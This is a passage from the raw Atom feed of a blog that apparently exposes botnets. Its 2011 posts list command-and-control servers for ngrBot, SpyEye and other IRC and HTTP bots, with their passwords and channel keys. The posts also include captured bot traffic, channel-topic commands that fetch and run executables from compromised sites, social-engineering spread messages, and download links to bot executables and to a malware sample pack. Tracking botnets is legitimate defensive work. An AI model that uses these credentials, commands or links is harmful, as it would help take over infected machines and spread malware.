class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-5414986998801371427?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/5414986998801371427/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/jayiancomirc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5414986998801371427'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/5414986998801371427'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/jayiancomirc-botnet-hosted-in-united.html' title='jayian.com(irc botnet hosted in United States Kenmore Sentris Network Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2668168576950774965</id><published>2011-12-17T18:00:00.002+01:00</published><updated>2011-12-17T18:53:55.427+01:00</updated><title type='text'>xxlaa.com(ngrBot hosted in Russian Federation Selectel Ltd)</title><content type='html'>My estimation for this botnet size is 30-50k aproximatly&lt;br /&gt;&lt;br /&gt;Domains used to control bots:&lt;br /&gt;xxlaa.com active&lt;br /&gt;Sabukenke.com not active&lt;br /&gt;Alufina.com not activ&lt;br /&gt;xxlss.com not active&lt;br /&gt;xxlcc.com not active&lt;br /&gt;&lt;br /&gt;Resolved : [xxlaa.com] To [31.186.102.170]&lt;br /&gt;&lt;br /&gt;C&amp;C Server: 222.187.221.243:7777 PASS laekin0505x&lt;br /&gt;Server Password: &lt;br /&gt;Username: ynuvlog&lt;br /&gt;Nickname: n{DE|XPa}ynuvlog&lt;br /&gt;Channel: (Password: ) &lt;br /&gt;Channeltopic: &lt;br /&gt;C&amp;C Server: 31.186.102.170:7777 PASS laekin0505x&lt;br /&gt;Server Password: &lt;br /&gt;Username: sechfqy&lt;br /&gt;Nickname: n{DE|XPa}sechfqy&lt;br /&gt;Channel: #totalrenovation2011 (Password: ngrBot) &lt;br /&gt;JOIN #US&lt;br /&gt;Channeltopic: :$sx $upx http://www.fatm.org.ar/images/Winsoft.exe 48b4b8d537ac8e40587f11014ed92308&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/31.186.102.170&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2668168576950774965?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2668168576950774965/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/xxlaacomngrbot-hosted-in-russian.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2668168576950774965'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2668168576950774965'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/xxlaacomngrbot-hosted-in-russian.html' title='xxlaa.com(ngrBot hosted in Russian Federation Selectel Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-1914145336952256050</id><published>2011-12-16T23:54:00.000+01:00</published><updated>2011-12-16T23:54:45.314+01:00</updated><title type='text'>188.138.84.90(ngrBot hosted in Germany Intergenia Ag)</title><content type='html'>Remote Host Port Number&lt;br /&gt;188.138.84.90 9996 PASS ..&lt;br /&gt;&lt;br /&gt;199.15.234.7 80&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}ehftjhj&lt;br /&gt;USER ehftjhj 0 0 :ehftjhj&lt;br /&gt;PONG :34405528&lt;br /&gt;JOIN #Bots ngrBot&lt;br /&gt;PRIVMSG #Bots :[HTTP]: Updated HTTP spread message to "http://www.twom-pc.com"&lt;br /&gt;&lt;br /&gt;Now talking in #Bots&lt;br /&gt;Topic On: [ #Bots ] [ !http.set http://www.twom-pc.com ]&lt;br /&gt;Topic By: [ Juicers2 ]&lt;br /&gt;Modes On: [ #Bots ] [ +sntu ]&lt;br /&gt;(Juicers2) !stats&lt;br /&gt;({IL|2K3a}cortawb) [usb="0" msn="0" http="0" total="0"]&lt;br /&gt;({IL|2K3a}cortawb) [ftp="0" pop="0" http="0" total="0"]&lt;br /&gt;({UA|XPu}ygurita) [usb="0" msn="0" http="0" total="0"]&lt;br /&gt;({UA|XPu}ygurita) [ftp="0" pop="0" http="0" total="0"]&lt;br /&gt;(Juicers2) who are you?&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/188.138.84.90&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-1914145336952256050?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/1914145336952256050/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/1881388490ngrbot-hosted-in-germany.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1914145336952256050'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/1914145336952256050'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/1881388490ngrbot-hosted-in-germany.html' title='188.138.84.90(ngrBot hosted in Germany Intergenia Ag)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2939522597522467973</id><published>2011-12-13T15:26:00.003+01:00</published><updated>2011-12-29T01:27:26.390+01:00</updated><title type='text'>elperro23.net(ngrBot hosted in United States Seattle Dme Hosting Llc)</title><content type='html'>Domains used to control bots:&lt;br /&gt;elperro23.net&lt;br /&gt;elperro3.net&lt;br /&gt;&lt;br /&gt;Resolved : [elperro23.net] To [74.221.210.169]&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;199.15.234.7 80&lt;br /&gt;217.160.124.219 80&lt;br /&gt;74.221.210.169 5236 PASS ROCKR&lt;br /&gt;&lt;br /&gt;PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :)"&lt;br /&gt;PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 20 domain(s)&lt;br /&gt;NICK n{US|XPa}rvtvjgd&lt;br /&gt;USER rvtvjgd 0 0 :rvtvjgd&lt;br /&gt;JOIN #ROCK ngrBot&lt;br /&gt;JOIN #rockspread&lt;br /&gt;PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"&lt;br /&gt;PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"&lt;br /&gt;PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :) |"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now talking in #ROCK&lt;br /&gt;Topic On: [ #ROCK ] [ ,mdns http://www.anrodphoto.com/wp-content/plugins/do.txt | ,j #rockspread | ,up http://www.anrodphoto.com/wp-content/plugins/9upjmrlzz.exe 24A3AF8782C75ACC45C4BAA110EA6F70 ]&lt;br /&gt;Topic By: [ rockstar ]&lt;br /&gt;rockstar sets mode: +o rockstar&lt;br /&gt;&lt;br /&gt;Now talking in #rockspread&lt;br /&gt;Topic On: [ #rockspread ] [ ,msn.int 5 | ,http.int 5 | ,msn.set Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :) | ,http.set Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :) ]&lt;br /&gt;Topic By: [ rockstar ]&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;C&amp;C Server: 199.119.205.77:5236&lt;br /&gt;Server Password: &lt;br /&gt;Username: bswicfv&lt;br /&gt;Nickname: n{DE|XPa}bswicfv&lt;br /&gt;Channel: #ROCK (Password: ngrBot) &lt;br /&gt;Channeltopic: :,mdns http://imatchclub.com/_themes/main/new_age/css/domi.txt | ,up http://imatchclub.com/_themes/main/new_age/css/10upjmrlzz.exe 1B52EEAF196290FADE3A8C1AD62A8710 | ,j #rockspread&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;Remote Host Port Number&lt;br /&gt;184.22.118.196 5236 PASS ROCKR&lt;br /&gt;&lt;br /&gt;NICK n{US|XPa}ghzgyxn&lt;br /&gt;USER ghzgyxn 0 0 :ghzgyxn&lt;br /&gt;JOIN #ROCK ngrBot&lt;br /&gt;JOIN #rockspread&lt;br /&gt;PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 28 domain(s)&lt;br /&gt;&lt;br /&gt;UPDATE:&lt;br /&gt;Remote Host Port Number&lt;br /&gt;187.17.123.243 80&lt;br /&gt;199.15.234.7 80&lt;br /&gt;81.31.145.6 80&lt;br /&gt;199.193.252.177 5236 PASS ROCKR&lt;br /&gt;&lt;br /&gt;PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to "5"&lt;br /&gt;PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) - Redirected 24 domain(s)&lt;br /&gt;PRIVMSG #ROCK :[d="http://www.antiquitebonton.it/wp-content/plugins/updates/16upjmrlzz.exe" s="116236 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Wcxaxw.exe" - Download retries: 0&lt;br /&gt;NICK n{US|XPa}gukijqs&lt;br /&gt;USER gukijqs 0 0 :gukijqs&lt;br /&gt;JOIN #ROCK ngrBot&lt;br /&gt;JOIN #rockspread&lt;br /&gt;PRIVMSG #rockspread :[MSN]: Updated MSN spread message to "mira esta foto del accidente de JENIFER LOPEZ http://www.worldcounselling.com/IMG00359268.JPG su rostro quedo horrible. |"&lt;br /&gt;PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to "mira esta foto del accidente de JENIFER LOPEZ http://www.worldcounselling.com/IMG00359268.JPG su rostro quedo horrible. |"&lt;br /&gt;PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to "5"&lt;br /&gt;&lt;br /&gt;    The data identified by the following URLs was then requested from the remote web server:&lt;br /&gt;        http://www.aprendemos.xpg.com.br/wp-content/plugins/updates/do.txt&lt;br /&gt;        http://api.wipmania.com/&lt;br /&gt;        http://www.antiquitebonton.it/wp-content/plugins/updates/16upjmrlzz.exe&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/74.221.210.169&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2939522597522467973?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2939522597522467973/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/elperro23netngrbot-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2939522597522467973'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2939522597522467973'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/elperro23netngrbot-hosted-in-united.html' title='elperro23.net(ngrBot hosted in United States Seattle Dme Hosting Llc)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2023405176614384230</id><published>2011-12-12T23:04:00.000+01:00</published><updated>2011-12-12T23:04:35.082+01:00</updated><title type='text'>BlackIce Server(http Bot hosted in Germany Gunzenhausen Hetzner Online Ag)</title><content type='html'>Bot Panel&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-OAHNPp_MFI8/TuZ5assLi-I/AAAAAAAAAKI/M6gUljYdmFg/s1600/blackice.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-OAHNPp_MFI8/TuZ5assLi-I/AAAAAAAAAKI/M6gUljYdmFg/s320/blackice.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;exe file &lt;br /&gt;&lt;a href="http://www.multiupload.com/R1N90XPT49" target="_blank"&gt;Download&lt;/a&gt;&lt;br /&gt;&lt;a href="http://757380e2.seriousdeals.net/" target="_blank"&gt;Download &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;exe connects here&lt;br /&gt;keto.w2c.ru 92.241.169.250&lt;br /&gt;http://92.241.169.250/index.php?action=add&amp;a=7&amp;u=---------&amp;l=&amp;p=---------&amp;c=DELL-D3E62F7E26 (keto.w2c.ru)&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/92.241.169.250&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2023405176614384230?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2023405176614384230/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/blackice-serverhttp-bot-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2023405176614384230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2023405176614384230'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/blackice-serverhttp-bot-hosted-in.html' title='BlackIce Server(http Bot hosted in Germany Gunzenhausen Hetzner Online Ag)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-OAHNPp_MFI8/TuZ5assLi-I/AAAAAAAAAKI/M6gUljYdmFg/s72-c/blackice.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-675040990045666682</id><published>2011-12-12T21:09:00.000+01:00</published><updated>2011-12-12T21:09:47.818+01:00</updated><title type='text'>paradoxnet.ru(SpyEye v1.3 hosted in Ukraine Lugansk Fop Opria Ruslan Dmitrievich)</title><content type='html'>Now alot of idiots are using spyeye here is the example&lt;br /&gt;&lt;br /&gt;SpyEye Panels&lt;br /&gt;http://sna.paradoxnet.ru/spy/gate.php&lt;br /&gt;http://paradoxnet.ru/spy/gate.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;SpyEye Directory&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-5T2Jny5uOg8/TuZY-_l5knI/AAAAAAAAAI4/OslBfJceEUo/s1600/paradoxnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-5T2Jny5uOg8/TuZY-_l5knI/AAAAAAAAAI4/OslBfJceEUo/s320/paradoxnet.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Back-connect server&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-F4Ecbp7ZMzg/TuZZoeaC2lI/AAAAAAAAAJA/_4_YwzrPgQ8/s1600/bc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-F4Ecbp7ZMzg/TuZZoeaC2lI/AAAAAAAAAJA/_4_YwzrPgQ8/s320/bc.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;SpyEye Collector v0.3.9&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-Hq5dSB0rQuo/TuZaTCHxBhI/AAAAAAAAAJI/89FxDIl_k7o/s1600/sc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-Hq5dSB0rQuo/TuZaTCHxBhI/AAAAAAAAAJI/89FxDIl_k7o/s320/sc.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;SpyEye Collector v0.3.9 configuration file&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-HRlWH9aaLoc/TuZa1RF1lPI/AAAAAAAAAJQ/gelPvo7O_yg/s1600/sec.config.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-HRlWH9aaLoc/TuZa1RF1lPI/AAAAAAAAAJQ/gelPvo7O_yg/s320/sec.config.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;SpyEye Collector v0.3.9 sql tables&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-daOJO1schPg/TuZbsS3DjBI/AAAAAAAAAJY/8HJa5Q2F9sw/s1600/tables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-daOJO1schPg/TuZbsS3DjBI/AAAAAAAAAJY/8HJa5Q2F9sw/s320/tables.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Formgraber panel&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-iJiiH9rAWU4/TuZcOKLyI9I/AAAAAAAAAJg/wNuIYmr9YDw/s1600/frm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-iJiiH9rAWU4/TuZcOKLyI9I/AAAAAAAAAJg/wNuIYmr9YDw/s320/frm.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;SpyEye Gate Installer&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-WhWVUAgB8_Y/TuZc2nVVsCI/AAAAAAAAAJo/BbeqeXfbr1k/s1600/install.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-WhWVUAgB8_Y/TuZc2nVVsCI/AAAAAAAAAJo/BbeqeXfbr1k/s320/install.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Picture1&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-41zOyOZGqVI/TuZeKQrpr4I/AAAAAAAAAJ4/NvgNdBUto5g/s1600/packspyeye.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-41zOyOZGqVI/TuZeKQrpr4I/AAAAAAAAAJ4/NvgNdBUto5g/s320/packspyeye.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Picture2&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-y1WewtguBWI/TuZdmbLCnZI/AAAAAAAAAJw/6s2t6SefrV0/s1600/gate-installer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-y1WewtguBWI/TuZdmbLCnZI/AAAAAAAAAJw/6s2t6SefrV0/s320/gate-installer.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;SpyEye Control Panel&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-QNz0ZyNAkyQ/TuZe403YVvI/AAAAAAAAAKA/F2ba0fEFD34/s1600/maincp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://1.bp.blogspot.com/-QNz0ZyNAkyQ/TuZe403YVvI/AAAAAAAAAKA/F2ba0fEFD34/s320/maincp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;u can also have the full SpyEye installer from this panel &lt;br /&gt;the problem is can u use it ? lol&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/91.213.8.76&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-675040990045666682?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/675040990045666682/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/paradoxnetruspyeye-v13-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/675040990045666682'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/675040990045666682'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/paradoxnetruspyeye-v13-hosted-in.html' title='paradoxnet.ru(SpyEye v1.3 hosted in Ukraine Lugansk Fop Opria Ruslan Dmitrievich)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-5T2Jny5uOg8/TuZY-_l5knI/AAAAAAAAAI4/OslBfJceEUo/s72-c/paradoxnet.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-4985119804304709903</id><published>2011-12-11T17:36:00.000+01:00</published><updated>2011-12-11T17:36:25.393+01:00</updated><title type='text'>lookshit.info(irc botnet hosted in Netherlands Amsterdam Ecatel Ltd)</title><content type='html'>Resolved : [lookshit.info] To [80.82.65.96]&lt;br /&gt;&lt;br /&gt;Remote Host Port Number&lt;br /&gt;80.82.65.96 65485 PASS biology&lt;br /&gt;&lt;br /&gt;Local users: Current Local Users: 390 Max: 418&lt;br /&gt;Global users: Current Global Users: 390 Max: 418&lt;br /&gt;&lt;br /&gt;USER bot 0 * : Merqy[UserName@COMPUTERNAME]&lt;br /&gt;NICK [wXP|EN|53124|M]&lt;br /&gt;JOIN #Merqy s3xy 89 bots inside&lt;br /&gt;JOIN #Merqy.EN s3xy 37 bots inside&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/80.82.65.96&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-4985119804304709903?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/4985119804304709903/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/lookshitinfoirc-botnet-hosted-in.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4985119804304709903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/4985119804304709903'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/lookshitinfoirc-botnet-hosted-in.html' title='lookshit.info(irc botnet hosted in Netherlands Amsterdam Ecatel Ltd)'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-8395066659536149903</id><published>2011-12-11T00:55:00.000+01:00</published><updated>2011-12-11T00:55:29.727+01:00</updated><title type='text'>94mb malware samples</title><content type='html'>This package have alot of irc bots,bankers,spreaders etc&lt;br /&gt;&lt;a href="http://1da2a89e.tinylinks.co/" target="_blank"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-8395066659536149903?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/8395066659536149903/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/94mb-malware-samples.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8395066659536149903'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/8395066659536149903'/><link rel='alternate' type='text/html' href='http://www.exposedbotnets.com/2011/12/94mb-malware-samples.html' title='94mb malware samples'/><author><name>Pig</name><uri>http://www.blogger.com/profile/14894907939553492625</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='12' src='http://1.bp.blogspot.com/-7kQ20oLo1uw/TsVtOg7LqTI/AAAAAAAAAIE/a6rHeP13RCU/s220/755d67fbce760704b19db198a6c7c97e.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2690706005301967154.post-2487386012271632434</id><published>2011-12-10T22:24:00.000+01:00</published><updated>2011-12-10T22:24:31.893+01:00</updated><title type='text'>208.77.223.114(irc botnet hosted in United States Arlington Texas Pulmonary &amp; Critical Care Consultants Pa )</title><content type='html'>Remote Host Port Number&lt;br /&gt;208.77.223.114 2345&lt;br /&gt;&lt;br /&gt;NICK New[USA|00|P|46702]&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Disabled.&lt;br /&gt;PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.&lt;br /&gt;USER XP-1537 * 0 :COMPUTERNAME&lt;br /&gt;MODE New[USA|00|P|46702] -ix&lt;br /&gt;JOIN #!loco!&lt;br /&gt;PONG 22 MOTD&lt;br /&gt;&lt;br /&gt;hosting infos:&lt;br /&gt;http://whois.domaintools.com/208.77.223.114&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-2487386012271632434?l=www.exposedbotnets.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.exposedbotnets.com/feeds/2487386012271632434/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.exposedbotnets.com/2011/12/20877223114irc-botnet-hosted-in-united.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2487386012271632434'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2690706005301967154/posts/default/2487386012271632434'/><link rel='alternate' type='text/html' 